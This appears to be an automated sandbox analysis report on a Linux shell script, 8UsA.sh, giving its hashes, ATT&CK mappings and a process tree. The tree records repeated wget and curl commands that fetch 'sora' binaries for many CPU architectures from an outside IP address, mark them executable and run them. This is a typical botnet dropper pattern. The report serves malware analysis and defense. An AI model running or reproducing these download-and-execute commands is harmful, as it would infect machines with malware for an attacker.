19c3c3cc30eb913fe9ac16c32d73b328ddbacb45285b5c875ae23c482cd485c4

Analysis

max time kernel
4s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
27/03/2025, 00:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

2KB
MD5

c9efcceb02b03898d46050ecf0c1edf8
SHA1

8617de96fe1264b9364df4e65c6ed8ecb1b4b6db
SHA256

19c3c3cc30eb913fe9ac16c32d73b328ddbacb45285b5c875ae23c482cd485c4
SHA512

b64866098a7eb9ac2e64446aa95674f13b8504fd5fdadc088fb1cffac3a3bf9bb863ca273bb86e4afd9caa69a2af4fec90b3cabd8964f88e1b2bb3b2e7aee830

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1506	chmod
1511	chmod
1521	chmod
1532	chmod
1537	chmod
1494	chmod
1516	chmod
1527	chmod
1542	chmod
1547	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/sora	1495	8UsA.sh
/tmp/sora	1507	8UsA.sh
/tmp/sora	1512	8UsA.sh
/tmp/sora	1517	8UsA.sh
/tmp/sora	1522	8UsA.sh
/tmp/sora	1528	8UsA.sh
/tmp/sora	1533	8UsA.sh
/tmp/sora	1538	8UsA.sh
/tmp/sora	1543	8UsA.sh
/tmp/sora	1548	8UsA.sh

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1496	wget
1504	curl
1505	cat
1507	sora

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.sora.x86	curl
File opened for modification	/tmp/sora	8UsA.sh
File opened for modification	/tmp/sora.sora.mpsl	curl
File opened for modification	/tmp/sora.sora.arm5	curl
File opened for modification	/tmp/sora.sora.arm7	curl
File opened for modification	/tmp/sora.sora.ppc	curl
File opened for modification	/tmp/sora.sora.mips	curl
File opened for modification	/tmp/sora.sora.arm4	curl
File opened for modification	/tmp/sora.sora.arm6	curl
File opened for modification	/tmp/sora.sora.m68k	curl
File opened for modification	/tmp/sora.sora.sh4	curl

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1481
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.x86
  2⤵
  PID:1482
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.x86
  2⤵
  - Writes file to tmp directory
  PID:1486
- /bin/cat
  cat sora.sora.x86
  2⤵
  PID:1492
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1494
- /tmp/sora
  ./sora sora.x86
  2⤵
  PID:1495
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:1496
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1504
- /bin/cat
  cat sora.sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:1505
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.mips sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/sora
  ./sora sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:1507
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.mpsl
  2⤵
  PID:1508
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1509
- /bin/cat
  cat sora.sora.mpsl
  2⤵
  PID:1510
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.mips sora.sora.mpsl sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/sora
  ./sora sora.mpsl
  2⤵
  PID:1512
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm4
  2⤵
  PID:1513
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm4
  2⤵
  - Writes file to tmp directory
  PID:1514
- /bin/cat
  cat sora.sora.arm4
  2⤵
  PID:1515
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.arm4 sora.sora.mips sora.sora.mpsl sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/sora
  ./sora sora.arm4
  2⤵
  PID:1517
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm5
  2⤵
  PID:1518
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:1519
- /bin/cat
  cat sora.sora.arm5
  2⤵
  PID:1520
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.arm4 sora.sora.arm5 sora.sora.mips sora.sora.mpsl sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1521
- /tmp/sora
  ./sora sora.arm5
  2⤵
  PID:1522
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm6
  2⤵
  PID:1523
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/cat
  cat sora.sora.arm6
  2⤵
  PID:1526
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.mips sora.sora.mpsl sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /tmp/sora
  ./sora sora.arm6
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm7
  2⤵
  PID:1529
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/cat
  cat sora.sora.arm7
  2⤵
  PID:1531
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.mips sora.sora.mpsl sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /tmp/sora
  ./sora sora.arm7
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.ppc
  2⤵
  PID:1534
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/cat
  cat sora.sora.ppc
  2⤵
  PID:1536
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.mips sora.sora.mpsl sora.sora.ppc sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/sora
  ./sora sora.ppc
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.m68k
  2⤵
  PID:1539
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/cat
  cat sora.sora.m68k
  2⤵
  PID:1541
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.m68k sora.sora.mips sora.sora.mpsl sora.sora.ppc sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/sora
  ./sora sora.m68k
  2⤵
  PID:1543
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.sh4
  2⤵
  PID:1544
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:1545
- /bin/cat
  cat sora.sora.sh4
  2⤵
  PID:1546
- /bin/chmod
  chmod +x 8UsA.sh config-err-Zq653C netplan_vm7zfz3d snap-private-tmp sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.m68k sora.sora.mips sora.sora.mpsl sora.sora.ppc sora.sora.sh4 sora.sora.x86 ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-S8tJrF
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /tmp/sora
  ./sora sora.sh4
  2⤵
  PID:1548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/sora.sora.x86

Filesize
276B

MD5
91887113c379652accbb2e569277ab0e

SHA1
b5dc361165215e8c87697b8effc9a534f401e993

SHA256
9585eb3a06e59e8e9c80827c2891ba2b1ab47ef4c21f3d74524eb9a5003992e6

SHA512
a4a56f6df2260f5f999b44f7bf8b26358f43d2f64e5dba85a511d5fb16658b0589cbca23a4d65ed125243f0a931713ab6e27d203eecb5bb581ce67a4efb4bdd2

Download Submit